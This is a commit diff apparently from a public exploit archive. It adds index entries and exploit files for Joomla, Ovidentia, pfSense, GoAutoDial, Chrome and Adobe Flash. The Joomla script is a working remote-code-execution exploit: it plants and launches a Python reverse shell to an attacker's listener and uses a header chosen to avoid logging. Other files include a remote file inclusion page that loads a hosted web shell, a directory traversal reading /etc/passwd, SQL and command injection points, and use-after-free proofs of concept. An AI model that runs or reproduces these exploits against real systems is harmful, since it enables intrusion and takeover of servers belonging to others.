DB: 2015-12-19

23 new exploits

files.csv

@@ -35202,6 +35202,7 @@ id,file,description,date,author,platform,type,port
 38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include Vulnerability",2013-12-24,"TUNISIAN CYBER",php,webapps,0
 38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
 38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 '.EAC3' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
+38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0
 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal Vulnerability",2013-10-03,"Sisco Barrera",php,webapps,0
 38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' Arbitrary File Upload Vulnerability",2014-01-07,"TUNISIAN CYBER",php,webapps,0
 38944,platforms/php/webapps/38944.txt,"Command School Student Management System /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
@@ -35287,3 +35288,25 @@ id,file,description,date,author,platform,type,port
 39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39032,platforms/php/webapps/39032.txt,"bloofoxCMS /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39033,platforms/php/remote/39033.py,"Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,remote,80
+39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80
+39035,platforms/win64/local/39035.txt,"Microsoft Windows win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win64,local,0
+39038,platforms/php/webapps/39038.txt,"PFSense <= 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0
+39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0
+39040,platforms/windows/dos/39040.txt,"Adobe Flash MovieClip.attachBitmap - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39041,platforms/windows/dos/39041.txt,"Adobe Flash MovieClip.startDrag - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39042,platforms/windows/dos/39042.txt,"Adobe Flash MovieClip.duplicateMovieClip - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39043,platforms/win64/dos/39043.txt,"Adobe Flash Selection.SetSelection - Use-After-Free",2015-12-18,"Google Security Research",win64,dos,0
+39044,platforms/windows/dos/39044.txt,"Adobe Flash TextField.sharpness Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39045,platforms/windows/dos/39045.txt,"Adobe Flash TextField.thickness Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39046,platforms/windows/dos/39046.txt,"Adobe Flash TextField.setFormat - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39047,platforms/windows/dos/39047.txt,"Adobe Flash TextField.replaceSel - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39048,platforms/windows/dos/39048.txt,"Adobe Flash TextField.replaceText - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39049,platforms/windows/dos/39049.txt,"Adobe Flash TextField Variable - Use-After Free",2015-12-18,"Google Security Research",windows,dos,0
+39050,platforms/windows/dos/39050.txt,"Adobe Flash TextField.variable Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39051,platforms/windows/dos/39051.txt,"Adobe Flash TextField.htmlText Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39052,platforms/windows/dos/39052.txt,"Adobe Flash TextField.type Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39053,platforms/windows/dos/39053.txt,"Adobe Flash TextField.text Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39054,platforms/windows/dos/39054.txt,"Adobe Flash TextField.tabIndex Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39055,platforms/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0

platforms/multiple/dos/39039.txt

@@ -0,0 +1,68 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=664
+
+There is an overflow in the ui::PlatformCursor WebCursor::GetPlatformCursor method. In src/content/common/cursors/webcursor_aurax11.cc&q=webcursor_aurax11.cc, there is the following code:
+
+bitmap.allocN32Pixels(custom_size_.width(), custom_size_.height());
+memcpy(bitmap.getAddr32(0, 0), custom_data_.data(), custom_data_.size());
+
+The bitmap buffer is allocated based on the width and height of the custom_size_, but the memcpy is performed using the size of the custom_data_.
+
+These values are set during WebCursor deserialization in src/content/common/cursors/webcursor.cc in WebCursor::Deserialize.
+
+custom_size_ is set from two integers that a deserialized from a message and can be between 0 and 1024. custom_data_ is set from a vector that is deserialized, and can be any size, unrelated to the width and height. The custom_data_ is verified not to be smaller than the expected pixel buffer based on the width and height, but can be longer.
+
+GetPlatformCursor is called indirectly by RenderWidgetHostImpl::OnSetCursor, which is called in response to a  ViewHostMsg_SetCursor message from the renderer.
+
+The issue above is in the x11 implementation, but it appears also affect other platform-specific implementations other than the Windows one, which instead reads out of bounds.
+
+I recommend this issue be fixed by changing the check in WebCursor::Deserialize:
+
+if (size_x * size_y * 4 > data_len)
+    return false;
+
+to
+
+if (size_x * size_y * 4 != data_len)
+    return false;
+
+to prevent the issue in all platform-specific implementations.
+ 
+To reproduce the issue replace WebCursor::Serialize with:
+
+bool WebCursor::Serialize(base::Pickle* pickle) const {
+
+  if(type_ == WebCursorInfo::TypeCustom){
+  LOG(WARNING) << "IN SERIALIZE\n";
+  if (!pickle->WriteInt(type_) ||
+      !pickle->WriteInt(hotspot_.x()) ||
+      !pickle->WriteInt(hotspot_.y()) ||
+      !pickle->WriteInt(2) ||
+      !pickle->WriteInt(1) ||
+      !pickle->WriteFloat(custom_scale_))
+     return false;
+   }else{
+
+     if (!pickle->WriteInt(type_) ||
+      !pickle->WriteInt(hotspot_.x()) ||
+      !pickle->WriteInt(hotspot_.y()) ||
+      !pickle->WriteInt(custom_size_.width()) ||
+      !pickle->WriteInt(custom_size_.height()) ||
+      !pickle->WriteFloat(custom_scale_))
+    return false;
+
+  }
+  const char* data = NULL;
+  if (!custom_data_.empty())
+    data = &custom_data_[0];
+  if (!pickle->WriteData(data, custom_data_.size()))
+    return false;
+
+  return SerializePlatformData(pickle);
+}
+
+and visit the attached html page, with the attached image in the same directory.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39039.zip
+

platforms/php/remote/39033.py

@@ -0,0 +1,131 @@
+#!/usr/bin/env python
+
+# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
+# Date: 12/17/2015
+# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
+# Vendor Homepage: https://www.joomla.org/
+# Software Link: http://joomlacode.org/gf/project/joomla/frs/
+# Version: Joomla 1.5 - 3.4.5
+# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
+# CVE : CVE-2015-8562
+
+
+'''
+    Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
+    PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
+
+    Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
+    https://www.exploit-db.com/exploits/38977/
+
+    Vulnerability Info, Exploit, Detection:
+    https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
+
+    Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
+
+    Usage - Automate Blind RCE:
+    python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
+    $ touch /tmp/newhnewh    
+
+    Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
+    python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
+    [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
+    [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
+    <Response [200]>
+    [+] Spawning reverse shell....
+    <Response [200]>
+
+    Listening on [0.0.0.0] (family 0, port 4444)
+    $ python -c "import pty;pty.spawn('/bin/bash')"
+    www-data@ubuntu:/$ id
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    www-data@ubuntu:/$ 
+
+'''
+    
+import requests
+import subprocess
+import argparse
+import sys
+import base64
+ 
+# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
+def get_url(url, user_agent):
+ 
+    headers = {
+    'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
+    'x-forwarded-for': user_agent   # X-Forwarded-For header instead of UA
+    }
+    cookies = requests.get(url,headers=headers).cookies
+    for _ in range(3):
+        response = requests.get(url, headers=headers,cookies=cookies)    
+    return response
+
+
+def php_str_noquotes(data):
+    "Convert string to chr(xx).chr(xx) for use in php"
+    encoded = ""
+    for char in data:
+        encoded += "chr({0}).".format(ord(char))
+ 
+    return encoded[:-1]
+
+ 
+def generate_payload(php_payload):
+ 
+    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
+ 
+    terminate = '\xf0\xfd\xfd\xfd';
+    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
+    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
+    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
+    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
+ 
+    return exploit_template
+
+
+def main():
+    parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
+    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
+    parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
+    parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
+    parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
+
+    args = parser.parse_args()
+
+    if args.cmd:
+        print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
+        print "[-] Dropping into shell-like environment to perform blind RCE"
+        while True:
+            command = raw_input('$ ')
+            cmd_str = "system('{}');".format(command)
+            pl = generate_payload(cmd_str)
+            print get_url(args.RHOST, pl)
+
+    # Spawn Reverse Shell using Netcat listener + Python shell on victim
+    elif args.LPORT and args.LPORT:
+        connection = "'{}', {}".format(args.LHOST, args.LPORT)
+
+        # pentestmonkey's Python reverse shell one-liner:
+        shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
+        # Base64 encoded the Python reverse shell as some chars were messing up in the exploit
+        encoded_comm = base64.b64encode(shell_str)
+        # Stage 1 payload Str
+        payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
+        print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
+        print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
+        # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
+        pl = generate_payload("system('"+payload+"');")
+        print get_url(args.RHOST, pl)
+        # Spawns Shell listener using netcat on LHOST
+        listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
+        print "[+] Spawning reverse shell...."
+        # Stage 2: Executes Python reverse shell back to LHOST:LPORT
+        pl = generate_payload("system('python /tmp/newhnewh.py');")
+        print get_url(args.RHOST, pl)
+    else:
+        print '[!] missing arguments'
+        parser.print_help()
+
+
+if __name__ == "__main__":
+    main()

platforms/php/webapps/38941.txt

@@ -0,0 +1,176 @@
+# Title : GoAutoDial CE 3.3 Multiple SQL injections, Command Injection
+# Date : 06/12/2015
+# Author : R-73eN
+# Tested on : goautodial-32bit-ce-3.3-final
+# Software : http://goautodial.org/
+#  ___        __        ____                 _    _  
+# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
+#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
+#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
+# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
+#
+
+Vulnerabilities
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+call_report_export.php
+
+Line 131
+
+$LOGip = getenv("REMOTE_ADDR");
+$LOGbrowser = getenv("HTTP_USER_AGENT");
+$LOGscript_name = getenv("SCRIPT_NAME");
+$LOGserver_name = getenv("SERVER_NAME");
+$LOGserver_port = getenv("SERVER_PORT");
+$LOGrequest_uri = getenv("REQUEST_URI");
+$LOGhttp_referer = getenv("HTTP_REFERER");
+if (preg_match("/443/i",$LOGserver_port)) {$HTTPprotocol = 'https://';}
+  else {$HTTPprotocol = 'http://';}
+if (($LOGserver_port == '80') or ($LOGserver_port == '443') ) {$LOGserver_port='';}
+else {$LOGserver_port = ":$LOGserver_port";}
+$LOGfull_url = "$HTTPprotocol$LOGserver_name$LOGserver_port$LOGrequest_uri";
+
+$stmt="INSERT INTO vicidial_report_log set event_date=NOW(), user='$PHP_AUTH_USER', ip_address='$LOGip', report_name='$report_name', browser='$LOGbrowser', referer='$LOGhttp_referer', notes='$LOGserver_name:$LOGserver_port $LOGscript_name |$campaign[0], $query_date, $end_date|', url='$LOGfull_url';";
+
+
+The $LOGip , $LOGbrowser etc are not sanitized are passed directly to a sql query.
+For example passing  a crafted User-Agent header  will cause a sql injection attack.
+
+The following files were vulnerable for the same vulnerability.
+call_report_export.php
+voice_lab.php
+user_status.php
+user_stats.php
+timeclock_status.php
+timeclock_report.php
+sph_report.php
+group_hourly_stats.php
+realtime_report.php
+lead_report_export.php
+list_download.php
+fcstats.php
+call_report_export.php
+AST_VICIDIAL_ingrouplist.php
+AST_VICIDIAL_hopperlist.php
+AST_usergroup_login_report.php
+AST_team_performance_detail.php
+AST_VDADstats.php
+AST_server_performance.php
+campaign_debug.php
+AST_LIST_UPDATEstats.php
+AST_LISTS_campaign_stats.php
+AST_OUTBOUNDsummary_interval.php
+AST_IVRstats.php
+AST_IVRfilter.php
+AST_inbound_daily_report.php
+and in many other files.
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+web_form_forward.php
+Line 15
+
+if (isset($_GET["user"])) {$user=$_GET["user"];}
+
+require("dbconnect.php");
+$stmt="SELECT full_name from vicidial_users where user='$user';";
+$rslt=mysql_query($stmt, $link);
+$row=mysql_fetch_row($rslt);
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+QM_live_monitor.php
+
+If the QueueMetrics is enabled the following file is vulnerable to sql injection
+
+. LINE 31
+if (isset($_GET["call"])){$call=$_GET["call"];}
+elseif (isset($_POST["call"]))	{$call=$_POST["call"];}
+.
+.
+.
+$stmt = "SELECT user,server_ip,conf_exten,comments FROM vicidial_live_agents where callerid='$call';";
+
+
+As u can see the $call parameter is not sanitized which leads to Sql injection.
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+call_log_display.php SQL injection
+
+
+there is no validation on the $server_ip and $session_name an
+if( (strlen($server_ip)<6) or (!isset($server_ip)) or ( (strlen($session_name)<12) or (!isset($session_name)) ) )
+.
+.
+$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
+.
+.
+The if statement can be bypassed very easily, we need to provide an input more then 6 characters and more then 12 characters.
+Then the parameters get passed ot the sql query and we have sql injection again.
+
+The same vulnerability was found to.
+
+conf_extn_check.php
+inbound_popup.php
+live_extn_check.php
+manager_send.php
+park_calls_display.php
+active_list_refresh.php
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+SCRIPT_multirecording_AJAX.php SQL injection
+
+.
+.
+.
+if (isset($_GET["campaign"]))	{$campaign=$_GET["campaign"];}
+	elseif (isset($_POST["campaign"]))	{$campaign=$_POST["campaign"];}
+.
+.
+.
+$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";
+
+Again $campaign is not sanetized
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+recording_lookup.php SQL injection
+.
+.
+(isset($_GET["QUERY_recid"]))		{$QUERY_recid=$_GET["QUERY_recid"];}
+elseif (isset($_POST["QUERY_recid"]))	{$QUERY_recid=$_POST["QUERY_recid"];}
+.
+.
+$stmt="select recording_id,lead_id,user,filename,location,start_time,length_in_sec from recording_log where filename LIKE \"%$QUERY_recid%\" order by recording_id desc LIMIT 1;";
+$QUERY_recid is not sanitized.
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+vicidial_sales_viewer.php SQL injection , Command Injection
+the $dcampaign parameter is not sanitized.
+
+.
+.
+if (isset($_GET["dcampaign"]))				{$dcampaign=$_GET["dcampaign"];}
+elseif (isset($_POST["dcampaign"]))			{$dcampaign=$_POST["dcampaign"];}
+.
+.
+$stmt="select campaign_id, campaign_name from vicidial_campaigns where campaign_id='$dcampaign'"; // Here we have the sql injection
+.
+.
+passthru("$WeBServeRRooT/vicidial/spreadsheet_sales_viewer.pl $list_ids $sales_number $timestamp $forc $now $dcampaign"); // Command injection
+
+
+
+https://www.infogen.al/ - Infogen AL

platforms/php/webapps/39034.html

@@ -0,0 +1,64 @@
+<!--
+# Title: Ovidentia maillist 4.0 Module Remote File Inclusion Exploit
+# Author: bd0rk
+# eMail: bd0rk[at]hackermail.com
+# Twitter: twitter.com/bd0rk
+# Tested on: Ubuntu-Linux
+# Google-Dork: n/a-->Not for kiddies!
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fmaillist&file=maillist-4-0.zip&idf=794
+
+PoC:
+
+maillist-4-0/programs/mlincl.php line 4
+------------------------------------------------------------------------
+
+@include_once $GLOBALS['babInstallPath'].'utilit/registerglobals.php';
+
+------------------------------------------------------------------------
+Greetz: GoLd_M(Welcome back bro'!) :), x0r_32, Anonymous, LulzSec
+
+----------------
+~~Exploitcode~~
+----------------
+-->
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<script language="JavaScript">
+
+var a="/maillist-4-0/programs/"
+var b="mlincl.php"
+var c="?GLOBALS[babInstallPath]="
+
+var shellcode="http://yourshellpath.com/c99.txt?"
+
+function it(){
+xpl.action= document.xpl.victim.value+a+b+c+shellcode;xpl.submit();
+}
+</script>
+</head>
+
+<body bgcolor="#FFFFFF">
+<p align="middle"><font color="#0000FF"><b>Ovidentia maillist 4.0 Module Remote File Inclusion Exploit</b></font></p>
+<form method="post" name="xpl" onSubmit="it();">
+    <p align="left">
+    <b><font face="Tahoma" size="2"><font color="#FF0000">Usage</font>:http://someone/directory</a></font>
+        or
+        </font>
+        <font face="Tahoma" size="2" color="#000000">http://someone</font><font 
+size="2" face="Tahoma"></a> <font size="2">&nbps;--></font></font></b><font 
+size="2" face="Tahoma">
+        <input type="text" name="someone" size="20";"></p>
+<center>
+ 
+</p>
+  <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" 
+value="reset" name="B2" style="float: left"></p>
+</form>
+<p><br>
+&nbps;</p>
+</center>
+</body>
+ 
+</html>

platforms/php/webapps/39038.txt

@@ -0,0 +1,57 @@
+# Title : PFSense  <= 2.2.5 Directory Traversal
+# Date : 18/12/2015
+# Author : R-73eN
+# Tested on : PFSense 2.2.5
+# Software : https://github.com/pfsense/pfsense
+# Vendor : https://pfsense.org/
+#  ___        __        ____                 _    _  
+# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
+#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
+#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
+# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
+#
+#
+# Fix provided by the vendor https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
+#
+#
+
+
+In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered the following vulnerabilities in the pfsense Webgui.
+
+The following files are vulnerable to a file inclusion attack
+
+wizard.php?xml=
+pkg.php?xml=
+
+Both of this files do not sanitize the path of the xml parameter and we can load xml files, and loading a special crafted xml file we can gain command execution.
+
+Example:
+1.xml (the filename can be whatever .txt , .jpg etc because it does not check for the file extension)
+
+The content of the 1.xml should be:
+
+<?xml version="1.0" encoding="utf-8" ?>
+<pfsensewizard>
+<totalsteps>12</totalsteps>
+<step>
+<id>1</id>
+<title>LFI example </title>
+<description>Lfi example </description>
+<disableheader>on</disableheader>
+<stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction>
+<includefile>/etc/passwd</includefile>
+</step>
+</pfsensewizard>
+
+the parameter <includefile> is passed to a require_once() function which triggers the File inclusion Attack.
+As we all know File inclusion attack can be converted to  RCE  very easily.
+
+Then visiting
+
+http://vulnhost/wizard.php?xml=../../../1.xml
+
+where the "xml" parameter is the path of the crafted file, will trigger the vulnerability.
+
+Thanks
+Rio Sherri
+https://www.infogen.al/ - Infogen AL

platforms/win64/dos/39043.txt

@@ -0,0 +1,25 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=590
+
+There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed. A minimal PoC follows:
+
+var mc = this.createEmptyMovieClip("mc", 301);
+var myText_txt = mc.createTextField("myText_txt", 302, 1, 1, 100, 100);
+myText_txt.text = "this is my text";
+Selection.setFocus("myText_txt");
+var n = {valueOf : func};
+Selection.setSelection(n, 3);
+
+function func(){
+
+  mc.removeMovieClip();
+  // Fix heap here
+  return 0;
+
+}
+
+A sample swf and fla are attached. Note that this PoC only works on 64-bit platforms.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39043.zip
+

platforms/win64/local/39035.txt

@@ -0,0 +1,12 @@
+# Exploit Title: MS15-010/CVE-2015-0057 win32k Local Privilege Escalation
+# Date: 2015-12-17
+# Exploit Author: Jean-Jamil Khalife
+# Software Link: http://www.microsoft.com
+# Version: Windows 8.1 (x64)
+# Tested on: Windows 8.1 (x64)
+# CVE : CVE-2015-0057
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip
+

platforms/windows/dos/39040.txt

@@ -0,0 +1,25 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=593
+
+There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.
+
+A minimal PoC follows:
+
+this.createEmptyMovieClip("mc", 1);
+var b = new flash.display.BitmapData(100, 100, true, 0x77777777);
+mc.attachBitmap( b, {valueOf : func });
+
+function func(){
+	
+	mc.removeMovieClip();
+	
+        // Fix heap here
+
+        return 5;
+	
+	}
+	
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39040.zip
+

platforms/windows/dos/39041.txt

@@ -0,0 +1,26 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=592
+
+There is a use-after-free in MovieClip.startDrag. If a parameter an object with valueOf defined, this method can free the MovieClip, which is then used.
+
+A minimal POC follows:
+
+this.createEmptyMovieClip("mc", 1);
+mc.startDrag( true, {valueOf : func}, 1, 2, 3, 4);
+
+
+function func(){
+	
+	mc.removeMovieClip();
+	
+        // Fix heap here
+
+	return 1;
+	
+	}
+	
+A sample fla and swf are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39041.zip
+

platforms/windows/dos/39042.txt

@@ -0,0 +1,30 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=591
+
+There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used. 
+
+A minimal PoC follows:
+
+
+this.createEmptyMovieClip("mc", 1);
+
+mc.duplicateMovieClip( "mc",{valueOf : func});
+
+
+function func(){
+	
+	trace("in func");
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return 5;
+	
+	}
+	
+	
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39042.zip
+

platforms/windows/dos/39044.txt

@@ -0,0 +1,32 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=588
+
+There is a use-after-free in the TextField sharpness setter. If the sharpness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.
+
+A minimal PoC is as follows:
+
+var times = 0;
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.sharpness = {valueOf : func};
+
+function func(){
+   
+        if(times == 0){
+          times++;
+          return 0;
+        }
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return 0;
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39044.zip
+

platforms/windows/dos/39045.txt

@@ -0,0 +1,32 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=587
+
+There is a use-after-free in the TextField thickness setter. If the thickness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.
+
+A minimal PoC is as follows:
+
+var times = 0;
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.thickness = {valueOf : func};
+
+function func(){
+   
+        if(times == 0){
+          times++;
+          return 0;
+        }
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return 0;
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39045.zip
+

platforms/windows/dos/39046.txt

@@ -0,0 +1,34 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=586
+
+The TextField setFormat method contains a use-after-free. If an integer parameter has valueOf defined, or the object parameter overrides a constructor, this method can free the TextField parent, which is subsequently used.
+
+A minimal PoC is as follows:
+
+var times = 0;
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+var f = new TextFormat();
+tf.setFormat( {valueOf : func}, 2, f);
+
+function func(){
+
+        if(times == 0){
+             times++;
+             return 0;
+
+         }
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return 0;
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39046.zip
+

platforms/windows/dos/39047.txt

@@ -0,0 +1,26 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=585
+
+There is a use-after-free in TextField.replaceSel. If the string parameter of the method is set to an object with toString defined, this method can delete the TextField's parent, leading to a use-after-free.
+
+A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.replaceSel({valueOf : func});
+
+function func(){
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return "text";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39047.zip
+

platforms/windows/dos/39048.txt

@@ -0,0 +1,27 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=584
+
